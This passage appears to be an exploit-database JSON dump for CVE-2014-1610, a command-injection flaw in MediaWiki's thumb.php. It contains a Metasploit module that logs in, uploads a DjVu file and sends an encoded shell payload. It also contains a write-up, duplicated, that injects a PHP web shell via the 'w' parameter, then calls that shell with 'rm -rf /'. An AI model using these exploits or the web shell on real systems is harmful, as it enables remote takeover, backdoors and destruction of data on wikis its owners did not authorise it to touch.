upload_mime.add_part(\"#{file_name}\", nil, nil, \"form-data; name=\\\"wpDestFile\\\"\")\r\n upload_mime.add_part(\"#{rand_text_alpha(4)}\", nil, nil, \"form-data; name=\\\"wpUploadDescription\\\"\")\r\n upload_mime.add_part(\"\", nil, nil, \"form-data; name=\\\"wpLicense\\\"\")\r\n upload_mime.add_part(\"1\",nil,nil, \"form-data; name=\\\"wpIgnoreWarning\\\"\")\r\n upload_mime.add_part(wp_edit_token, nil, nil, \"form-data; name=\\\"wpEditToken\\\"\") if upload_csrf\r\n upload_mime.add_part(title, nil, nil, \"form-data; name=\\\"title\\\"\")\r\n upload_mime.add_part(\"1\", nil, nil, \"form-data; name=\\\"wpDestFileWarningAck\\\"\")\r\n upload_mime.add_part(wp_upload, nil, nil, \"form-data; name=\\\"wpUpload\\\"\")\r\n post_data = 
upload_mime.to_s\r\n \r\n print_status(\"Uploading DjVu file #{file_name}...\")\r\n \r\n upload = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'data' => post_data,\r\n 'ctype' => \"multipart/form-data; boundary=#{upload_mime.bound}\",\r\n 'cookie' => auth_cookie\r\n })\r\n \r\n if upload and upload.code == 302 and upload.headers['Location']\r\n location = upload.headers['Location']\r\n print_good(\"File uploaded to #{location}\")\r\n else\r\n if upload.body.include? 'not a permitted file type'\r\n fail_with(Failure::NotVulnerable, \"Wiki is not configured for target files.\")\r\n else\r\n fail_with(Failure::UnexpectedReply, \"Failed to upload file.\")\r\n end\r\n end\r\n \r\n payload_request(uri, file_name, my_platform)\r\n end\r\n \r\n def payload_request(uri, file_name, my_platform)\r\n if my_platform == Msf::Module::Platform::Windows\r\n trigger = \"1)&(#{payload.encoded})&\"\r\n else\r\n trigger = \"1;#{payload.encoded};\"\r\n end\r\n \r\n vars_get = { 'f' => file_name }\r\n if file_name.include? '.pdf'\r\n vars_get['width'] = trigger\r\n elsif file_name.include? 
'.djvu'\r\n vars_get['width'] = 1\r\n vars_get['p'] = trigger\r\n else\r\n fail_with(Failure::BadConfig, \"Unsupported file extension: #{file_name}\")\r\n end\r\n \r\n print_status(\"Sending payload request...\")\r\n r = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'thumb.php'),\r\n 'vars_get' => vars_get\r\n }, 1)\r\n \r\n if r && r.code == 404 && r.body =~ /not exist/\r\n print_error(\"File: #{file_name} does not exist.\")\r\n elsif r\r\n print_error(\"Received response #{r.code}, exploit probably failed.\")\r\n end\r\n end\r\n \r\n # The order of name, value keeps shifting so regex is painful.\r\n # Cant use nokogiri due to security issues\r\n # Cant use REXML directly as its not strict XHTML\r\n # So we do a filthy mixture of regex and REXML\r\n def get_html_value(html, type, name, value)\r\n return nil unless html\r\n return nil unless type\r\n return nil unless name\r\n return nil unless value\r\n \r\n found = nil\r\n html.each_line do |line|\r\n if line =~ /(<#{type}[^\\/]*name=\"#{name}\".*?\\/>)/i\r\n found = $&\r\n break\r\n end\r\n end\r\n \r\n if found\r\n doc = REXML::Document.new found\r\n return doc.root.attributes[value]\r\n end\r\n \r\n ''\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21922"}, {"lastseen": "2018-02-09T05:24:21", "description": "Exploit for multiple platform in category web applications", "edition": 2, "published": "2014-02-02T00:00:00", "type": "zdt", "title": "MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-02T00:00:00", "id": "1337DAY-ID-21844", "href": "https://0day.today/exploit/description/21844", "sourceData": "# Exploit:\r\n####################################################################\r\n1. 
upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\r\nhttp://vulnerable-site/index.php/Special:Upload\r\n2. inject os cmd to upload a php-backdoor\r\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\r\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\r\n3. access to php-backdoor!\r\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\r\n4. happy pwning!!\r\n \r\n \r\n# Related files:\r\n####################################################################\r\nthumb.php <-- extract all _GET array to params\r\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\r\noptions\r\n/includes/media/ImageHandler.php\r\n/includes/GlobalFunctions.php\r\n/includes/filerepo/file/File.php\r\n \r\n# Vulnerability Analysis:\r\n####################################################################\r\n1. thumb.php\r\nThis script used to resize images if it is configured to be done\r\nwhen the web browser requests the image\r\n<? ...\r\n1.1 Called directly, use $_GET params\r\nwfThumbHandleRequest();\r\n1.2 Handle a thumbnail request via query parameters\r\nfunction wfThumbHandleRequest() {\r\n$params = get_magic_quotes_gpc()\r\n? array_map( 'stripslashes', $_GET )\r\n: $_GET; << WTF\r\n \r\nwfStreamThumb( $params ); // stream the thumbnail\r\n}\r\n1.3 Stream a thumbnail specified by parameters\r\nfunction wfStreamThumb( array $params ) {\r\n...\r\n$fileName = isset( $params['f'] ) ? 
$params['f'] : ''; // << puts\r\nuploaded.pdf file here\r\n...\r\n// Backwards compatibility parameters\r\nif ( isset( $params['w'] ) ) {\r\n$params['width'] = $params['w']; // << Inject os cmd here!\r\nunset( $params['w'] );\r\n}\r\n...\r\n$img = wfLocalFile( $fileName );\r\n...\r\n// Thumbnail isn't already there, so create the new thumbnail...\r\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\r\nby width/height\r\n...\r\n// Stream the file if there were no errors\r\n$thumb->streamFile( $headers );\r\n...\r\n?>\r\n2. /includes/filerepo/file/File.php\r\n<? ...\r\nfunction transform( $params, $flags = 0 ) { ...\r\n$handler = $this->getHandler(); // << PDF Handler\r\n...\r\n$normalisedParams = $params;\r\n$handler->normaliseParams( $this, $normalisedParams );\r\n...\r\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\r\n..\r\n?>\r\n3. /extensions/PdfHandler/PdfHandler_body.php\r\n<? ...\r\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\r\n...\r\n$width = $params['width'];\r\n...\r\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\r\nparameters\r\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\r\n-dLastPage={$page}\";\r\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\r\n$srcPath );\r\n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor );\r\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\r\nargument\r\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\r\n$cmd .= \" 2>&1\";\r\n...\r\n$err = wfShellExec( $cmd, $retval );\r\n...\r\n?>\r\n4. /includes/GlobalFunctions.php\r\nExecute a shell command, with time and memory limits\r\n<? 
...\r\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\r\narray() ) {\r\n...\r\npassthru( $cmd, $retval ); // << Execute here!!\r\n \r\n# Proof-Of-Concept\r\n####################################################################\r\nGET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n \r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\r\n \r\n</p>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n \r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n \r\n \r\n# Back-end $cmd\r\n####################################################################\r\nGlobalFunctions.php : wfShellExec()\r\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\r\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' 
|\r\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\r\nsystem(\\\\$_GET[1]);\">images/longcat.php` -\r\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.14 (GNU/Linux)\r\n \r\niQIcBAEBAgAGBQJS7SLLAAoJEB2kHapd1XMU8BcP/A+hMUw/EDwChN+2XjtExVGU\r\nBzPrpXXBbp6WGWkeztmrT78Y1b1lXX/cQA4V9IGrdHUEdgG0p3y476d7eZ5sPxVf\r\nny9Xg7o4WtMgmSvSOOc+lCsy9aAKab801cs1HLbwZokwK8ItwQQoGfik0BgNQ4l1\r\nmijELis1z1f3k6yJ9/OJicnIJDmHIzPL9wQyr2A5c+jjz74SR//SlQPrqDbvEpj2\r\nuCCpTpjf6LGYCzyGmqROlf+OxFTeXdB9oghButrEtQ9w6qGQg1/UZjmbx/xLkCqb\r\nGO1R4qs0PuV4uepwcbLzDDWW5kPejPjcwpuyjrpQO45OcIUtkvzR4iypCxxkvktv\r\nn2l09Dtn9HqbK3QXhTb2u3uhM9RyJd7kFKhfmZ85OnvMmYvaXSeDWs7Wd9GEO5wh\r\nFXbhL9O2u/bqiabQKnsJ6bx8hcm2a9mO+/yJZUyBXybHrjseRD4LQFWUYR/WPAQt\r\nvuICIQyO5pcjkIib+0DN4e7xcFMYuo3o6WkSZuZT+l0LwYDVmhUbaGAEP13+dWZZ\r\nM0HGoI7AITsqukYFH1n7NYjJazF3Bckc0iJbCrI39TYkvr3V9bRWSEfVBM6FcBan\r\nkumwDlzYP/301fsKGLtfsnUmK2qkj1EF3DVoJbZ5VFdgiUSlCMsbp9qdGfUPbelR\r\n2LmeyQR2rzjBB7Sovvcn\r\n=ooEs\r\n-----END PGP SIGNATURE-----\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21844"}, {"lastseen": "2018-01-01T11:12:53", "description": "Exploit for multiple platform in category web applications", "edition": 2, "published": "2014-02-02T00:00:00", "type": "zdt", "title": "MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-02-02T00:00:00", "id": "1337DAY-ID-21845", "href": "https://0day.today/exploit/description/21845", "sourceData": "####################################################################\r\n#\r\n# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)\r\n# Reported by Netanel Rubin - Check Point\u2019s Vulnerability Research Group (Jan 19, 2014)\r\n# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)\r\n# 
Affected website : Wikipedia.org and more !\r\n#\r\n# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)\r\n# Release dates : Feb 1, 2014\r\n# Special Thanks to 2600 Thailand !\r\n#\r\n####################################################################\r\n \r\n# Exploit:\r\n####################################################################\r\n1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)\r\nhttp://vulnerable-site/index.php/Special:Upload\r\n2. inject os cmd to upload a php-backdoor\r\nhttp://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20\r\n\"<?php%20system(\\\\$_GET[1]);\">images/xnz.php`\r\n3. access to php-backdoor!\r\nhttp://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root\r\n4. happy pwning!!\r\n \r\n \r\n# Related files:\r\n####################################################################\r\nthumb.php <-- extract all _GET array to params\r\n/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width\r\noptions\r\n/includes/media/ImageHandler.php\r\n/includes/GlobalFunctions.php\r\n/includes/filerepo/file/File.php\r\n \r\n# Vulnerability Analysis:\r\n####################################################################\r\n1. thumb.php\r\nThis script used to resize images if it is configured to be done\r\nwhen the web browser requests the image\r\n<? ...\r\n1.1 Called directly, use $_GET params\r\nwfThumbHandleRequest();\r\n1.2 Handle a thumbnail request via query parameters\r\nfunction wfThumbHandleRequest() {\r\n$params = get_magic_quotes_gpc()\r\n? array_map( 'stripslashes', $_GET )\r\n: $_GET; << WTF\r\n \r\nwfStreamThumb( $params ); // stream the thumbnail\r\n}\r\n1.3 Stream a thumbnail specified by parameters\r\nfunction wfStreamThumb( array $params ) {\r\n...\r\n$fileName = isset( $params['f'] ) ? 
$params['f'] : ''; // << puts\r\nuploaded.pdf file here\r\n...\r\n// Backwards compatibility parameters\r\nif ( isset( $params['w'] ) ) {\r\n$params['width'] = $params['w']; // << Inject os cmd here!\r\nunset( $params['w'] );\r\n}\r\n...\r\n$img = wfLocalFile( $fileName );\r\n...\r\n// Thumbnail isn't already there, so create the new thumbnail...\r\n$thumb = $img->transform( $params, File::RENDER_NOW ); // << resize image\r\nby width/height\r\n...\r\n// Stream the file if there were no errors\r\n$thumb->streamFile( $headers );\r\n...\r\n?>\r\n2. /includes/filerepo/file/File.php\r\n<? ...\r\nfunction transform( $params, $flags = 0 ) { ...\r\n$handler = $this->getHandler(); // << PDF Handler\r\n...\r\n$normalisedParams = $params;\r\n$handler->normaliseParams( $this, $normalisedParams );\r\n...\r\n$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );\r\n..\r\n?>\r\n3. /extensions/PdfHandler/PdfHandler_body.php\r\n<? ...\r\nfunction doTransform( $image, $dstPath, $dstUrl, $params, $flags = 0 ) {\r\n...\r\n$width = $params['width'];\r\n...\r\n$cmd = '(' . wfEscapeShellArg( $wgPdfProcessor ); // << craft shell cmd &\r\nparameters\r\n$cmd .= \" -sDEVICE=jpeg -sOutputFile=- -dFirstPage={$page}\r\n-dLastPage={$page}\";\r\n$cmd .= \" -r{$wgPdfHandlerDpi} -dBATCH -dNOPAUSE -q \". wfEscapeShellArg(\r\n$srcPath );\r\n$cmd .= \" | \" . wfEscapeShellArg( $wgPdfPostProcessor );\r\n$cmd .= \" -depth 8 -resize {$width} - \"; // << FAILED to escape shell\r\nargument\r\n$cmd .= wfEscapeShellArg( $dstPath ) . \")\";\r\n$cmd .= \" 2>&1\";\r\n...\r\n$err = wfShellExec( $cmd, $retval );\r\n...\r\n?>\r\n4. /includes/GlobalFunctions.php\r\nExecute a shell command, with time and memory limits\r\n<? 
...\r\nfunction wfShellExec( $cmd, &$retval = null, $environ = array(), $limits =\r\narray() ) {\r\n...\r\npassthru( $cmd, $retval ); // << Execute here!!\r\n \r\n# Proof-Of-Concept\r\n####################################################################\r\nGET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n \r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\r\n \r\n</p>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n \r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n \r\n \r\n# Back-end $cmd\r\n####################################################################\r\nGlobalFunctions.php : wfShellExec()\r\ncmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150\r\n-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' 
|\r\n'/usr/bin/convert' -depth 8 -resize 10|`echo \"<?php\r\nsystem(\\\\$_GET[1]);\">images/longcat.php` -\r\n'/tmp/transform_0e377aad0e27-1.jpg') 2>&1\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21845"}], "seebug": [{"lastseen": "2017-11-19T14:53:18", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "MediaWiki Thumb.php - Remote Command Execution", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1610"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-85082", "id": "SSV:85082", "sourceData": "\n ##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'MediaWiki Thumb.php Remote Command Execution',\r\n 'Description' => %q{\r\n MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11,\r\n when DjVu or PDF file upload support is enabled, allows remote unauthenticated\r\n users to execute arbitrary commands via shell metacharacters. 
If no target file\r\n is specified this module will attempt to log in with the provided credentials to\r\n upload a file (.DjVu) to use for exploitation.\r\n },\r\n 'Author' =>\r\n [\r\n 'Netanel Rubin', # from Check Point - Discovery\r\n 'Brandon Perry', # Metasploit Module\r\n 'Ben Harris', # Metasploit Module\r\n 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-1610' ],\r\n [ 'OSVDB', '102630'],\r\n [ 'URL', 'http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html' ],\r\n [ 'URL', 'https://bugzilla.wikimedia.org/show_bug.cgi?id=60339' ]\r\n ],\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Automatic PHP-CLI',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "\\r\\n",\r\n 'PrependEncoder' => "php -r \\"",\r\n 'AppendEncoder' => "\\""\r\n },\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP\r\n }\r\n ],\r\n [ 'Linux CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl python php',\r\n }\r\n },\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ],\r\n [ 'Windows CMD',\r\n {\r\n 'Payload' =>\r\n {\r\n 'BadChars' => "",\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl',\r\n }\r\n },\r\n 'Platform' => ['win'],\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Jan 28 2014'))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, "Base MediaWiki path", '/mediawiki' ]),\r\n OptString.new('FILENAME', [ false, "Target DjVu/PDF file (e.g target.djvu target.pdf)", nil ]),\r\n OptString.new('USERNAME', [ false, "Username to authenticate with", '' ]),\r\n OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ])\r\n ], self.class)\r\n end\r\n\r\n def get_version(body)\r\n meta_generator = get_html_value(body, 'meta', 
'generator', 'content')\r\n\r\n unless meta_generator\r\n vprint_status("No META Generator tag on #{full_uri}.")\r\n return nil, nil, nil\r\n end\r\n\r\n if meta_generator && meta_generator =~ /mediawiki/i\r\n vprint_status("#{meta_generator} detected.")\r\n meta_generator =~ /(\\d)\\.(\\d+)[\\.A-z]+(\\d+)/\r\n major = $1.to_i\r\n minor = $2.to_i\r\n patch = $3.to_i\r\n vprint_status("Major:#{major} Minor:#{minor} Patch:#{patch}")\r\n\r\n return major, minor, patch\r\n end\r\n\r\n return nil, nil, nil\r\n end\r\n\r\n def check\r\n uri = target_uri.path\r\n\r\n opts = { 'uri' => normalize_uri(uri, 'index.php') }\r\n\r\n response = send_request_cgi!(opts)\r\n\r\n if opts['redirect_uri']\r\n vprint_status("Redirected to #{opts['redirect_uri']}.")\r\n end\r\n\r\n unless response\r\n vprint_status("No response from #{full_uri}.")\r\n return CheckCode::Unknown\r\n end\r\n\r\n # Mediawiki will give a 404 for unknown pages but still have a body\r\n if response.code == 200 || response.code == 404\r\n vprint_status("#{response.code} response received...")\r\n\r\n major, minor, patch = get_version(response.body)\r\n\r\n unless major\r\n return CheckCode::Unknown\r\n end\r\n\r\n if major == 1 && (minor < 8 || minor > 22)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 22 && patch > 1)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 21 && patch > 4)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 19 && patch > 10)\r\n return CheckCode::Safe\r\n elsif major == 1\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n vprint_status("Received response code #{response.code} from #{full_uri}")\r\n CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n uri = target_uri.path\r\n\r\n print_status("Grabbing version and login CSRF token...")\r\n response = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'vars_get' => { 'title' => 'Special:UserLogin' }\r\n })\r\n\r\n unless response\r\n 
fail_with(Failure::NotFound, "Failed to retrieve webpage.")\r\n end\r\n\r\n server = response['Server']\r\n if server && target.name =~ /automatic/i && server =~ /win32/i\r\n vprint_status("Windows platform detected: #{server}.")\r\n my_platform = Msf::Module::Platform::Windows\r\n elsif server && target.name =~ /automatic/i\r\n vprint_status("Nix platform detected: #{server}.")\r\n my_platform = Msf::Module::Platform::Unix\r\n else\r\n my_platform = target.platform.platforms.first\r\n end\r\n\r\n # If we have already identified a DjVu/PDF file on the server trigger\r\n # the exploit\r\n unless datastore['FILENAME'].blank?\r\n payload_request(uri, datastore['FILENAME'], my_platform)\r\n return\r\n end\r\n\r\n username = datastore['USERNAME']\r\n password = datastore['PASSWORD']\r\n\r\n major, minor, patch = get_version(response.body)\r\n\r\n # Upload CSRF added in v1.18.2\r\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\r\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\r\n upload_csrf = false\r\n elsif ((major == 1) && (minor < 18))\r\n upload_csrf = false\r\n else\r\n upload_csrf = true\r\n end\r\n\r\n session_cookie = response.get_cookies\r\n\r\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\r\n\r\n if wp_login_token.blank?\r\n fail_with(Failure::UnexpectedReply, "Couldn't find login token. 
Is URI set correctly?")\r\n else\r\n print_good("Retrieved login CSRF token.")\r\n end\r\n\r\n print_status("Attempting to login...")\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'method' => 'POST',\r\n 'vars_get' => {\r\n 'title' => 'Special:UserLogin',\r\n 'action' => 'submitlogin',\r\n 'type' => 'login'\r\n },\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'wpName' => username,\r\n 'wpPassword' => password,\r\n 'wpLoginAttempt' => 'Log in',\r\n 'wpLoginToken' => wp_login_token\r\n }\r\n })\r\n\r\n if login and login.code == 302\r\n print_good("Log in successful.")\r\n else\r\n fail_with(Failure::NoAccess, "Failed to log in.")\r\n end\r\n\r\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\r\n\r\n # Testing v1.15.1 it looks like it has session fixation\r\n # vulnerability so we dont get a new session cookie after\r\n # authenticating. Therefore we need to include our old cookie.\r\n unless auth_cookie.include? 'session='\r\n auth_cookie << session_cookie\r\n end\r\n\r\n print_status("Getting upload CSRF token...") if upload_csrf\r\n upload_file = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'cookie' => auth_cookie\r\n })\r\n\r\n unless upload_file and upload_file.code == 200\r\n fail_with(Failure::NotFound, "Failed to access file upload page.")\r\n end\r\n\r\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\r\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\r\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\r\n\r\n if upload_csrf && wp_edit_token.blank?\r\n fail_with(Failure::UnexpectedReply, "Couldn't find upload token. 
Is URI set correctly?")\r\n elsif upload_csrf\r\n print_good("Retrieved upload CSRF token.")\r\n end\r\n\r\n upload_mime = Rex::MIME::Message.new\r\n\r\n djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1610", "metasploit.djvu"))\r\n file_name = "#{rand_text_alpha(4)}.djvu"\r\n\r\n upload_mime.add_part(djvu_file, "application/octet-stream", "binary", "form-data; name=\\"wpUploadFile\\"; filename=\\"#{file_name}\\"")\r\n upload_mime.add_part("#{file_name}", nil, nil, "form-data; name=\\"wpDestFile\\"")\r\n upload_mime.add_part("#{rand_text_alpha(4)}", nil, nil, "form-data; name=\\"wpUploadDescription\\"")\r\n upload_mime.add_part("", nil, nil, "form-data; name=\\"wpLicense\\"")\r\n upload_mime.add_part("1",nil,nil, "form-data; name=\\"wpIgnoreWarning\\"")\r\n upload_mime.add_part(wp_edit_token, nil, nil, "form-data; name=\\"wpEditToken\\"") if upload_csrf\r\n upload_mime.add_part(title, nil, nil, "form-data; name=\\"title\\"")\r\n upload_mime.add_part("1", nil, nil, "form-data; name=\\"wpDestFileWarningAck\\"")\r\n upload_mime.add_part(wp_upload, nil, nil, "form-data; name=\\"wpUpload\\"")\r\n post_data = upload_mime.to_s\r\n\r\n print_status("Uploading DjVu file #{file_name}...")\r\n\r\n upload = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'data' => post_data,\r\n 'ctype' => "multipart/form-data; boundary=#{upload_mime.bound}",\r\n 'cookie' => auth_cookie\r\n })\r\n\r\n if upload and upload.code == 302 and upload.headers['Location']\r\n location = upload.headers['Location']\r\n print_good("File uploaded to #{location}")\r\n else\r\n if upload.body.include? 
'not a permitted file type'\r\n fail_with(Failure::NotVulnerable, "Wiki is not configured for target files.")\r\n else\r\n fail_with(Failure::UnexpectedReply, "Failed to upload file.")\r\n end\r\n end\r\n\r\n payload_request(uri, file_name, my_platform)\r\n end\r\n\r\n def payload_request(uri, file_name, my_platform)\r\n if my_platform == Msf::Module::Platform::Windows\r\n trigger = "1)&(#{payload.encoded})&"\r\n else\r\n trigger = "1;#{payload.encoded};"\r\n end\r\n\r\n vars_get = { 'f' => file_name }\r\n if file_name.include? '.pdf'\r\n vars_get['width'] = trigger\r\n elsif file_name.include? '.djvu'\r\n vars_get['width'] = 1\r\n vars_get['p'] = trigger\r\n else\r\n fail_with(Failure::BadConfig, "Unsupported file extension: #{file_name}")\r\n end\r\n\r\n print_status("Sending payload request...")\r\n r = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'thumb.php'),\r\n 